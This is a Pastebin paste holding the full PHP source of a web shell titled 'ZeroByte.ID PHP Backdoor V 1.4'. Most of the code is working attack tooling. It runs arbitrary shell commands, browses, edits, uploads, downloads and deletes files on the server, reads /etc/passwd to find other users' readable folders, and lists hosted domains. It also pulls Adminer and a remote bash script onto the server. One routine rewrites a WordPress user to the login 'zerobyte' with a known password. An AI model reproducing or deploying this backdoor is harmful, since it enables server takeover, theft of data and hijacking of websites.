API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 21st, 2018
112
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.59 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. function exect($cmd) {
  6. if(function_exists('system')) {
  7. @ob_start();
  8. @system($cmd);
  9. $exect = @ob_get_contents();
  10. @ob_end_clean();
  11. return $exect;
  12. } elseif(function_exists('exec')) {
  13. @exec($cmd,$results);
  14. $exect = "";
  15. foreach($results as $result) {
  16. $exect .= $result;
  17. } return $exect;
  18. } elseif(function_exists('passthru')) {
  19. @ob_start();
  20. @passthru($cmd);
  21. $exect = @ob_get_contents();
  22. @ob_end_clean();
  23. return $exect;
  24. } elseif(function_exists('shell_exec')) {
  25. $exect = @shell_exec($cmd);
  26. return $exect;
  27. }
  28. }
  29.  
  30.  
  31. function fperms($filen) {
  32. $perms = fileperms($filen);
  33. $fpermsinfo .= (($perms & 0x0100) ? 'r' : '-');
  34. $fpermsinfo .= (($perms & 0x0080) ? 'w' : '-');
  35. $fpermsinfo .= (($perms & 0x0040) ?
  36. (($perms & 0x0800) ? 's' : 'x' ) :
  37. (($perms & 0x0800) ? 'S' : '-'));
  38. $fpermsinfo .= (($perms & 0x0020) ? 'r' : '-');
  39. $fpermsinfo .= (($perms & 0x0010) ? 'w' : '-');
  40. $fpermsinfo .= (($perms & 0x0008) ?
  41. (($perms & 0x0400) ? 's' : 'x' ) :
  42. (($perms & 0x0400) ? 'S' : '-'));
  43. $fpermsinfo .= (($perms & 0x0004) ? 'r' : '-');
  44. $fpermsinfo .= (($perms & 0x0002) ? 'w' : '-');
  45. $fpermsinfo .= (($perms & 0x0001) ?
  46. (($perms & 0x0200) ? 't' : 'x' ) :
  47. (($perms & 0x0200) ? 'T' : '-'));
  48. echo '<center><small>'.$fpermsinfo.'</small></center>';
  49. }
  50.  
  51. function eof() {echo "\x77\x77\x77\x2e\x7a\x65\x72\x6f\x62\x79\x74\x65\x2e\x69\x64";}
  52. ?>
  53. <title>ZeroByte.ID PHP Backdoor V 1.4</title>
  54. <link href='//fonts.googleapis.com/css?family=Share+Tech+Mono' rel='stylesheet' type='text/css'>
  55. <style type="text/css">
  56. body {
  57. font-family: courier;
  58. background: #f2f2f2;
  59. font-size: 1px;
  60. }
  61. h1 a {
  62. font-weight: normal;
  63. font-family: 'Share Tech Mono';
  64. font-size: 20px;
  65. color:#006600;
  66. text-decoration: none;
  67. margin: 0px;
  68. }
  69. h2 {
  70. font-size: 20px;
  71. color: #006600;
  72. text-align: center;
  73. padding-top: 5px;
  74. margin: 0;
  75. margin-top: 10px;
  76. }
  77. .menu {
  78. text-align: center;
  79. font-size: 12px;
  80. border-bottom: 1px dashed #006600;
  81. padding-bottom: 5px;
  82. margin-bottom: 10px;
  83. }
  84. .menu a {
  85. margin-top: 2px;
  86. color: #006600;
  87. text-decoration: none;
  88. display: inline-block;
  89. }
  90. .container {
  91. font-size: 12px;
  92. }
  93. .filemgr {
  94. font-size: 12px;
  95. width: 100%
  96. }
  97. .filemgr td {
  98. padding: 3px;
  99. border-bottom: 1px dashed #006600;
  100. }
  101. .filemgr a{
  102. text-decoration: none;
  103. color:#006600;
  104. }
  105. tr:hover {
  106. background: #cccccc;
  107. }
  108. .tdtl {
  109. background:#006600;color:#ffffff;text-align:center;font-weight:bold;
  110. }
  111. .footer {
  112. text-align: center;
  113. border-radius: 30px;
  114. margin-top: 25px;
  115. border-top: 1px double #006600;
  116. padding: 5px;
  117. }
  118. .footer a {
  119. color: #006600;
  120. text-decoration: none;
  121. }
  122. p {
  123. word-wrap: break-word;
  124. margin:2;
  125. }
  126. a {
  127. text-decoration: none;
  128. color: #006600;
  129. }
  130. .act {
  131. text-align: center;
  132. }
  133. .txarea {
  134. width:100%;
  135. height:200px;
  136. background:transparent;
  137. border:1px solid #006600;
  138. padding:1px;color:#006600;
  139. }
  140. h4 {
  141. margin:0;
  142. }
  143. </style>
  144. <div class="container">
  145. <div style="position:relative;width: 100%;margin-bottom: 5px;border-bottom: 1px dashed #006600;">
  146. <div style="float: left;width: 15%;text-align: center;border: 1px dashed #006600;margin-bottom: 5px;">
  147. <h1><a href="?">ZeroByte.ID<br><small>Shell V 1.4</small></a></h1>
  148. </div>
  149. <div style="float: right;width: 83%;">
  150. <?php
  151. echo php_uname();
  152. $mysql = (function_exists('mysql_connect')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  153. $curl = (function_exists('curl_version')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  154. $wget = (exect('wget --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  155. $perl = (exect('perl --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  156. $gcc = (exect('gcc --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  157. $disfunc = @ini_get("disable_functions");
  158. $show_disf = (!empty($disfunc)) ? "<font color=red>$disfunc</font>" : "<font color=#006600>NONE</font>";
  159. echo '<br>[ MySQL: '.$mysql.' ][ Curl: '.$curl.' ][ Wget: '.$wget.' ][ Perl: '.$perl.' ][ Compiler: '.$gcc.' ]';
  160. echo '<p>Disable Function: '.$show_disf;
  161.  
  162. ?>
  163. </div>
  164. <div style="clear: both;"></div>
  165. </div>
  166.  
  167. <?php
  168. if(empty($_GET)) {
  169. $dir = getcwd();
  170. }
  171. else {
  172. $dir = $_GET['path'];
  173. }
  174.  
  175. if(!empty($_GET['path'])) {$offdir = $_GET['path'];}
  176. else if(!empty($_GET['file'])) {$offdir = dirname($_GET['file']);}
  177. else if(!empty($_GET['lastpath'])) {$offdir = $_GET['lastpath'];}
  178. else {$offdir = getcwd();}
  179.  
  180. ?>
  181. <div class="menu">
  182. <a href="?ext=jumpusr&lastpath=<?php echo $offdir;?>">[ Readable User ]</a>
  183. <a href="?ext=sql_interface&lastpath=<?php echo $offdir;?>">[ SQL Interface ]</a>
  184. <a href="?ext=shellcmd&lastpath=<?php echo $offdir;?>">[ Shell Command ]</a>
  185. <a href="?ext=vdomain&lastpath=<?php echo $offdir;?>">[ Shows vDomain ]</a>
  186. <a href="?ext=stoolkit&lastpath=<?php echo $offdir;?>">[ Other Toolkit ]</a>
  187. <a href="?ext=uploader&lastpath=<?php echo $offdir;?>">[ Uploader ]</a>
  188. </div>
  189. <?php
  190. ## CURRENT DIR ##
  191. echo '<div style="margin-bottom:10px;">';
  192. echo '<span style="border:1px dashed #009900;padding:2px;">';
  193. $lendir = str_replace("\\","/",$offdir);
  194. $xlendir = explode("/", $lendir);
  195. foreach($xlendir as $c_dir => $cdir) {
  196. echo "<a href='?path=";
  197. for($i = 0; $i <= $c_dir; $i++) {
  198. echo $xlendir[$i];
  199. if($i != $c_dir) {
  200. echo "/";
  201. }
  202. }
  203. echo "'>$cdir</a>/";
  204. }
  205. echo '</span></div>';
  206. ## EOF CURRENT DIR ##
  207.  
  208. if(!empty($dir)) {
  209. echo '<table class="filemgr">';
  210. echo '<tr><td class="tdtl">Name</td><td class="tdtl" width="9%">Permission</td><td class="tdtl" width="18%">Action</td></tr>'."\n";
  211. $directories = array();
  212. $files_list = array();
  213. $files = scandir($dir);
  214. foreach($files as $file){
  215. if(($file != '.') && ($file != '..')){
  216. if(is_dir($dir.'/'.$file)){
  217. $directories[] = $file;
  218.  
  219. } else{
  220. $files_list[] = $file;
  221.  
  222. }
  223. }
  224. }
  225.  
  226. foreach($directories as $directory){
  227. echo '<tr><td><span class="dbox">[D]</span> <a href="?path='.$dir.'/'.$directory.'">'.$directory.'/</a></td>'."\n";
  228. echo '<td>';
  229. fperms($dir.'/'.$directory);
  230. echo '</td>'."\n";
  231. echo '<td class="act">';
  232. echo '<a href="?action=rename&file='.$dir.'/'.$directory.'" class="act">RENAME</a> ';
  233. echo '<a href="?action=rmdir&file='.$dir.'/'.$directory.'" class="act">DELETE</a>';
  234. echo '</td>'."\n";
  235. echo '</tr>'."\n";
  236. }
  237. foreach($files_list as $filename){
  238. if(preg_match('/(tar.gz)$/', $filename)) {
  239. echo '<tr><td><span class="dbox">[F]</span> <a href="#" class="act">'.$filename.'</a>'."\n";
  240. echo ' <a href="?ext=extract2tmp&gzname='.$dir.'/'.$filename.'" style="background:#006600;color:#ffffff;padding:1px;padding-left:5px;padding-right:5px;">EXTRACT TO TMP</a>';
  241. echo '</td>'."\n";
  242. echo '<td>';
  243. fperms($dir.'/'.$filename);
  244. echo '</td>'."\n";
  245. echo '<td class="act">';
  246. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  247. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  248. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  249. echo '</td>'."\n";
  250. echo '</tr>'."\n";
  251. }
  252. else {
  253. echo '<tr><td><span class="dbox">[F]</span> <a href="?action=view&file='.$dir.'/'.$filename.'" class="act">'.$filename.'</a></td>'."\n";
  254. echo '<td>';
  255. fperms($dir.'/'.$filename);
  256. echo '</td>'."\n";
  257. echo '<td class="act">';
  258. echo '<a href="?action=edit&file='.$dir.'/'.$filename.'" class="act">EDIT</a> ';
  259. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  260. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  261. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  262. echo '</td>'."\n";
  263. echo '</tr>'."\n";
  264. }
  265. }
  266. echo '</table>';
  267. }
  268.  
  269.  
  270. if($_GET['action'] == 'edit') {
  271. if($_POST['save']) {
  272. $save = file_put_contents($_GET['file'], $_POST['src']);
  273. if($save) {
  274. $act = "<font color=#006600>Successed!</font>";
  275. } else {
  276. $act = "<font color=red>Permission Denied!</font>";
  277. }
  278. echo "".$act."<br>";
  279. }
  280. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  281. echo "<form method='post'>
  282. <textarea name='src' class='txarea'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  283. <input type='submit' value='Save' name='save' style='width: 20%;background:#006600;border:none;color:#f2f2f2;margin-top:5px;height:30px;'>
  284. </form>";
  285. }
  286. else if($_GET['action'] == 'view') {
  287. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  288. echo "<textarea class='txarea' style='height:400px;' readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  289. }
  290. else if($_GET['action'] == 'rename') {
  291. $path = $offdir;
  292. if($_POST['do_rename']) {
  293. $rename = rename($_GET['file'], "$path/".htmlspecialchars($_POST['rename'])."");
  294. if($rename) {
  295. $act = "<font color=#006600>Successed!</font>";
  296. } else {
  297. $act = "<font color=red>Permission Denied!</font>";
  298. }
  299. echo "".$act."<br>";
  300. }
  301. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  302. echo "<form method='post'>
  303. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  304. <input type='submit' name='do_rename' value='rename'>
  305. </form>";
  306. }
  307. else if($_GET['action'] == 'delete') {
  308. $path = $offdir;
  309. $delete = unlink($_GET['file']);
  310. if($delete) {
  311.  
  312. } else {
  313. $act = "<font color=red>Permission Denied!</font>";
  314. }
  315. echo $act;
  316. } else if($_GET['action'] == 'rmdir') {
  317. $path = $offdir;
  318. $delete = rmdir($_GET['file']);
  319. if($delete) {
  320. echo '<font color=#006600>Deleted!</font><br>';
  321. } else {
  322. echo "\n<font color=red>Error remove dir, try to force delete!</font>\n<br>";
  323. exect('rm -rf '.$_GET['file']);
  324. if(file_exists($_GET['file'])) {
  325. echo '<font color=red>Permission Denied!</font>';
  326. } else
  327. {
  328. echo '<font color=#006600>Deleted!</font>';
  329. }
  330. }
  331.  
  332. } else if($_GET['action'] == 'download') {
  333. @ob_clean();
  334. $file = $_GET['file'];
  335. header('Content-Description: File Transfer');
  336. header('Content-Type: application/octet-stream');
  337. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  338. header('Expires: 0');
  339. header('Cache-Control: must-revalidate');
  340. header('Pragma: public');
  341. header('Content-Length: ' . filesize($file));
  342. readfile($file);
  343. exit;
  344. }
  345.  
  346. #### EOF #####
  347.  
  348. if($_GET['ext'] == 'jumpusr') {
  349.  
  350. echo '<h2>.::[ Readable User Path ]::.</h2>';
  351. echo "<br><center>";
  352. echo "[ <a href=\"?ext=jpublic_html&lastpath=".$_GET['lastpath']."\">/home/user/public_html</a> ]\n";
  353. echo "[ <a href=\"?ext=backupwordpress&lastpath=".$_GET['lastpath']."\">/home/user/backupwordpress</a> ]\n";
  354. echo "</center>";
  355.  
  356. }
  357.  
  358. ###################
  359.  
  360. if($_GET['ext'] == 'jpublic_html') {
  361. echo '<h2>.::[ Readable public_html ]::.</h2>';
  362. $i = 0;
  363. echo "<pre><div class='margin: 5px auto;'>";
  364. $etc = fopen("/etc/passwd", "r");
  365. while($passwd = fgets($etc)) {
  366. if($passwd == '' || !$etc) {
  367. echo "<center><font color=red>Can't read /etc/passwd</font></center>";
  368. } else {
  369. preg_match_all('/(.*?):x:/', $passwd, $user);
  370. foreach($user[1] as $users) {
  371. $user_dir = "/home/$users/public_html";
  372. if(is_readable($user_dir)) {
  373. $i++;
  374. $jrw = "[R] <a href='?path=$user_dir'>/home/$users/public_html</a>";
  375. if(is_writable($user_dir)) {
  376. $jrw = "[RW] <a href='?path=$user_dir'>/home/$users/public_html</a>";
  377. }
  378. echo $jrw."\n";
  379.  
  380. }
  381. }
  382. }
  383. }
  384. if($i == 0) {
  385. echo '<center><font color=red>public_html which readable is null in this host!</font></center>';
  386. } else {
  387. echo "<br>Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST'])."";
  388. }
  389. echo "</div></pre>";
  390. }
  391. #####################
  392. if($_GET['ext'] == 'backupwordpress') {
  393. echo '<h2>.::[ Readable Backupwordpress ]::.</h2>';
  394. $i = 0;
  395. echo "<pre><div class='margin: 5px auto;'>";
  396. $etc = fopen("/etc/passwd", "r");
  397. while($passwd = fgets($etc)) {
  398. if($passwd == '' || !$etc) {
  399. echo "<center><font color=red>Can't read /etc/passwd</font></center>";
  400. } else {
  401. preg_match_all('/(.*?):x:/', $passwd, $user);
  402. foreach($user[1] as $users) {
  403. $user_dir = "/home/$users/backupwordpress";
  404. if(is_readable($user_dir)) {
  405. $i++;
  406. $jrw = "[R] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  407. if(is_writable($user_dir)) {
  408. $jrw = "[RW] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  409. }
  410. echo $jrw."\n";
  411.  
  412. }
  413. }
  414. }
  415. }
  416. if($i == 0) {
  417. echo '<center><font color=red>backupwordpress is null in this host!</font></center>';
  418. } else {
  419. echo "<br>Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST'])."";
  420. }
  421. echo "</div></pre>";
  422. }
  423. #####################
  424. if($_GET['ext'] == 'vdomain') {
  425. echo '<center>';
  426. function vdomain($domaindir) {
  427. $domainfile = scandir($domaindir);
  428. $i = 0;
  429. echo "<table width='80%'>\n";
  430. echo "<tr><th>Domain</th><th>User</th><th>Jump BW</th></tr>";
  431. foreach($domainfile as $domain){
  432. $i++;
  433. if(!is_dir($domain) && !preg_match('/^[*.]/', $domain) && !preg_match('/[0-9]$/', $domain)) {
  434. $user = exec("ls -l $domaindir$domain | awk '{print $3}'");
  435. echo '<tr><td>'.$domain.'</td><td width="15%" align="center"><small>'.$user.'</small></td>';
  436. if(is_readable("/home/$user/backupwordpress")){
  437. echo '<td width="13%" align="center">Yes</td>';
  438. } else {
  439. echo '<td width="13%"><center><font color="red">No</font></center></td>';
  440. }
  441. echo '</tr>';
  442. }
  443. }
  444. echo "</table>\n";
  445. echo "Total $i Domains.";
  446. }
  447.  
  448. if(is_readable("/etc/vfilters/")) {
  449. $domaindir = '/etc/vfilters/';
  450. vdomain($domaindir);
  451. }
  452. else if(is_readable("/etc/valiases/")) {
  453. $domaindir = '/etc/valiases/';
  454. vdomain($domaindir);
  455. } else {
  456. echo "<h3 style=\"color:red;\">vDomain Is Empty!</h3>";
  457. }
  458. echo '</center>';
  459. }
  460.  
  461. ### EXTRACTOR TO TMP ###
  462. else if($_GET['ext'] == 'extract2tmp')
  463. {
  464. if (file_exists($_SERVER["DOCUMENT_ROOT"].'/tmp/') && is_writable($_SERVER["DOCUMENT_ROOT"].'/tmp/')) {
  465. $tmppath = $_SERVER["DOCUMENT_ROOT"].'/tmp/';
  466. }
  467. else if(file_exists(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/') && is_writable(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/')) {
  468. $tmppath = dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/';
  469. }
  470. else if(file_exists('/tmp/') && is_writable('/tmp/')) {
  471. $tmppath = '/tmp/';
  472. }
  473. else {
  474. $tmppath = '';
  475. }
  476.  
  477. if(!empty($tmppath)) {
  478. $gzfile = $_GET['gzname'];
  479. echo '[FILE] '.$gzfile.'<br>';
  480. echo '-- extract to --<br>';
  481. echo '[TMP] '.$tmppath.'<br>';
  482. $bsname = basename($gzfile);
  483. $gzrname = explode(".", $bsname);
  484. echo '<form method="post" action="">';
  485. echo '<input name="extract" type="submit" value="EXTRACT">';
  486. echo '</form>';
  487. if(!empty($_POST['extract'])) {
  488. exect('mkdir '.$tmppath.$gzrname[0]);
  489. $destdir = $tmppath.$gzrname[0];
  490. if (file_exists($destdir) && is_writable($destdir)) {
  491. echo "\n".'[EXTRACTED] <a href="?path='.$destdir.'">'.$destdir.'</a>'."\n";
  492. exect('tar -xzvf '.$gzfile.' -C '.$destdir);
  493. }
  494. else
  495. {
  496. echo 'FAILED!';
  497. }
  498. }
  499. }
  500. else {
  501. echo 'CANNOT EXTRACT TO TMP!';
  502. }
  503.  
  504. }
  505. ### EXTRACTOR TO TMP - EOF ###
  506.  
  507. ### CMD ###
  508. else if($_GET['ext'] == 'shellcmd')
  509. {
  510. echo '<h2>.::[ Shell Command ]::.</h2>';
  511. echo '<form method="post" action="">';
  512. echo 'terminal:~$ <input name="cmd" type="text" placeholder="echo zerobyte" style="width:300px"/>';
  513. echo ' <input type="submit" value=">>"/>';
  514. echo '</form>';
  515. if(!empty($_POST['cmd'])) {
  516. echo '<textarea style="width:100%;height:150px;" readonly>';
  517. $cmd = $_POST['cmd'];
  518. echo exect($cmd);
  519. echo '</textarea>';
  520. }
  521. }
  522. ### CMD EOF ###
  523.  
  524. ### UPLOADER ###
  525. else if($_GET['ext'] == 'uploader')
  526. {
  527. echo '<h2>.::[ Uploader ]::.</h2>';
  528. echo '<center>';
  529. echo '<form method=post enctype=multipart/form-data>';
  530. echo '<br><br>PATH ['.$offdir.']<br>';
  531. echo '<input type="file" name="zerofile"><input name="postupl" type="submit" value="Upload"><br>';
  532. echo '</form>';
  533. if($_POST["postupl"] == 'Upload')
  534. {
  535. if(@copy($_FILES["zerofile"]["tmp_name"],"$offdir/".$_FILES["zerofile"]["name"]))
  536. { echo '<b>OK! '."$offdir/".$_FILES["zerofile"]["name"].'</b>'; }
  537. else
  538. { echo '<b>Upload Failed.</b>'; }
  539. }
  540. echo '</center>';
  541. }
  542. ### UPLOADER EOF ###
  543.  
  544. ### MYSQL INTERFACE ###
  545. else if($_GET['ext'] == 'sql_interface')
  546. {
  547. echo '<h2>.::[ MySQL Interface ]::.</h2>';
  548. echo '<center>';
  549. $dwadminer = 'https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php';
  550. $fileadminer = 'z-adminer.php';
  551. function call_adminer($dwadminer, $fileadminer) {
  552. $fp = fopen($fileadminer, "w+");
  553. $ch = curl_init();
  554. curl_setopt($ch, CURLOPT_URL, $dwadminer);
  555. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  556. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  557. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  558. curl_setopt($ch, CURLOPT_FILE, $fp);
  559. return curl_exec($ch);
  560. curl_close($ch);
  561. fclose($fp);
  562. ob_flush();
  563. flush();
  564. file_put_contents($dwadminer, $fileadminer);
  565. }
  566. echo '<form method=post enctype=multipart/form-data>';
  567. echo '<input name="mysql_int" type="submit" value="Call Adminer 4.3.1"><br>';
  568. echo '</form>';
  569. if($_POST['mysql_int'] == 'Call Adminer 4.3.1') {
  570. call_adminer($dwadminer, $fileadminer);
  571. $linkz = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]";
  572. if(file_exists('z-adminer.php')) {
  573. echo '<a href="'.$linkz.dirname($_SERVER['PHP_SELF']).'/'.$fileadminer.'" target="_blank">Adminer OK!</a>';
  574. }
  575. else {
  576. echo '<font color="red">[FAILED]</font>';
  577. }
  578.  
  579. }
  580. echo '</center>';
  581. }
  582. ### MYSQL INTERFACE EOF ###
  583.  
  584.  
  585. else if($_GET['ext'] == 'stoolkit')
  586. {
  587. echo '<h2>.::[ Support Toolkit ]::.</h2>';
  588. echo '<center>';
  589. echo '<div style="text-align:left;">';
  590. echo '<form method=post enctype=multipart/form-data>';
  591. echo '<big>Backupwordpress Config Grabber & Auto Edit User</big> [ BASH ]<br>';
  592. echo '<input name="backupwpsh" type="submit" value="Download Here!">';
  593. echo '</form>';
  594. echo '</div>';
  595. if($_POST['backupwpsh']) {
  596. @ob_clean();
  597. $file = "https://pastebin.com/raw/i9WYErLw";
  598. header('Content-Description: File Transfer');
  599. header('Content-Type: text/plain');
  600. header('Content-Disposition: attachment; filename="backupwp.sh"');
  601. header('Expires: 0');
  602. header('Cache-Control: must-revalidate');
  603. header('Pragma: public');
  604. header('Content-Length: ' . filesize($file));
  605. echo (file_get_contents($file));
  606. exit;
  607. }
  608. echo '</center>';
  609. }
  610. ### MYSQL INTERFACE EOF ###
  611.  
  612. ### TAMBAHAN BACKUPWORDPRESS BASH ###
  613. if($_GET['grab'] == 'wp_options') {
  614. $userdb = $_POST['wpuser'];
  615. $passdb = $_POST['wppass'];
  616. $namedb = $_POST['wpdb'];
  617. $hostdb = $_POST['wphost'];
  618. echo 'WP_OPTIONS';
  619. if(!empty($userdb)) {
  620. $link = mysql_connect($hostdb, $userdb, $passdb);
  621. if (!$link) {die('Could not connect: ' . mysql_error());}
  622. if (!mysql_select_db($namedb)) {die('Could not select database: ' . mysql_error());}
  623. //
  624. $tblz = mysql_query("SELECT table_name FROM information_schema.tables WHERE table_schema='".$namedb."' AND table_name LIKE '%_options' LIMIT 1");
  625. if (!$tblz) {die('Could not query:' . mysql_error());}
  626. $tbl = mysql_result($tblz, 0, 'table_name'); // outputs third employee's name
  627. $result = mysql_query("SELECT option_value FROM ".$tbl." WHERE option_name = 'siteurl' AND option_id = '1'");
  628. if (!$result) {die('Tbl Could not query:' . mysql_error());}
  629. echo "\n".'[DOMAIN] '.mysql_result($result, 0, 'option_value')."\n"; // outputs third employee's name
  630. mysql_close($link);
  631. }
  632. } else if($_GET['grab'] == 'wp_users_updt') {
  633. $userdb = $_POST['wpuser'];
  634. $passdb = $_POST['wppass'];
  635. $namedb = $_POST['wpdb'];
  636. $hostdb = $_POST['wphost'];
  637. $prefix = $_POST['tpfx'];
  638. echo 'WP_USERS';
  639. $conn = new mysqli($hostdb, $userdb, $passdb, $namedb);
  640. if ($conn->connect_error) {
  641. die("Connection failed: " . $conn->connect_error);
  642. }
  643. $sql = "UPDATE ".$prefix."users SET user_login = 'zerobyte', user_pass = MD5('id1337') WHERE user_status = '0' LIMIT 1";
  644. if ($conn->query($sql) === TRUE) {
  645. echo "Record updated successfully";
  646. } else {
  647. echo "Error updating record: " . $conn->error;
  648. }
  649. $conn->close();
  650. }
  651. ### TAMBAHAN BACKUPWORDPRESS BASH EOF ###
  652.  
  653.  
  654.  
  655. ### FOOTER ###
  656. echo '<div class="footer">';
  657. echo '&copy; 2018 - <a href="https://zerobyte.id/" rel="nofollow" target="_blank">';
  658. eof();
  659. echo '</a>';
  660. echo '</div>';
  661. echo '</div>';
  662. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!